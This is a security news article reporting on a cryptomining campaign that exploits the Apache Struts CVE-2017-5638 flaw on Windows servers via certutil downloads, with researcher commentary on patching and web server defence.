Electroneum-mining operation now targeting Struts systems on Windows

News by Jay Jay

The well-known Apache Struts 2 Jakarta Multipart Parser remote code execution cryptocurrency campaign, is now being used by cyber-criminals to mine Electroneum coin by targeting systems running Windows operating systems.

The well-known Apache Struts 2 Jakarta Multipart Parser remote code execution cryptocurrency mining campaign, popularly known as CVE-2017-5638 among security researchers, is now being used by cyber-criminals to mine Electroneum coin by targeting systems running Windows operating systems.

According to security researchers at F5 Labs, the reason why cyber-criminals chose to mine Electroneum instead of popular cryptocurrencies like Monero or Bitcoin is that both Electroneum and Monero use the CryptoNight algorithm which can be mined on both CPUs and GPUs. They fear that by using this exploit, cyber-criminals could mine several other cryptocurrencies in the future.

While the campaign, which was first observed in July last year, initially targeted Struts systems running on the Linux operating system to mine Electroneum, cyber-criminals behind the operation slowly started shifting their attention to Struts systems running on Windows earlier this year. 

They achieved this by exploiting a a command-line tool named “certutil” which is normally used by developers to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

However, cyber-criminals behind the Electroneum mining campaign exploited a particular feature in Certutil that allowed anyone to fetch certificate files from remote hosts using the “urlcache” flag. By leveraging this feature, they downloaded a Windows installer file after using a legitimate NSIS (Nullsoft Scriptable Install System) tool to create it.

According to F5, "the installer script language is compatible with all major versions of Windows and provides an easy API to interact with different components of the operating system using simple syntax." Once executed, the installer initially checks the host system for e presence of ESET antivirus, and if it finds the software, it immediately stops the installation process.

If the host system doesn't contain the ESET antivirus software, the installer starts downloading and extracting several files within the system, including mssearch.exe which is, in fact, a cryptocurrency miner configured to mine Electroneum. The researchers noted that cyber-criminals have so far managed to mine around US$ 20 (£14) by using this exploit.

They added that in order to protect their systems from this mining operation, enterprises must patch the Apache Struts 2 Jakarta Multipart Parser remote code execution CVE-2017-5638 and implement web application firewalls to block such attacks.

Wicus Ross, a security researcher at SecureData, told SC Magazine UK that CVE-2017-5638 is well documented and understood exploit and cyber-criminals are frequently using it to target unpatched software.

"CVE-2017-5638 is how Equifax got burned. The exploit targets a Java based web application. Java runs on Linux, Windows, and many other operating systems. This makes writing cross platform remote code execution trivial," he noted.

He added that while web application firewalls could detect malicious actors trying well documented exploits, enterprises must also add many layers of defence and detection and also patch outdated software at the earliest.

"The shift to Windows based operating systems, while worrying, is an obvious evolution in my opinion, and this is possibly the tip of the iceberg; a poorly configured Web Server could easily act as a springboard to the internal infrastructure," warns Ed Williams, director EMEA, SpiderLabs at Trustwave.

"We know that Windows credential management is an issue for enterprise organisations, we know that generally speaking infrastructures do not do a good job of segmentation / segregation and that these two issues together allow trivial lateral movement, where more hosts can be easily compromised.  I am surprised this attack didn't go one-step further and attempt greater situational awareness and lateral movement to compromise hosts that could be further used for cryptomining.

"Web server security is extremely important, these are very interesting targets due to their nature, i.e. just sitting on the Internet, as such, extra care should be taken when securing them.  We would always recommend hardening of Web Servers and aggressive patching (they're external facing), white-listing of all applications that run on the web server is key and something we don't see enough of as an industry, only allow trusted applications that are required, anything and everything else should not be allowed to run," he adds. 

While Williams agrees that hackers would use this exploit more in the future, he says that the exploit will also evolve in complexity in the future to include other cryptocurrencies and could be stealthier than current versions. 

Joseph Carson, Chief Security Scientist at Thycotic, said: "I doubt hackers will continue to use this particular exploit as overtime it will decrease and systems will become patched reducing the effectiveness of this exploit thus the reason why hackers already ported it to Windows to give it some extra life. 

"Hackers will likely continue to reuse the method and technique to deploy the payload and most likely replace the exploit with another to keep the momentum and continue to mine Electroneum or other cryptocurrencies in the future."
Crime & Threats

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews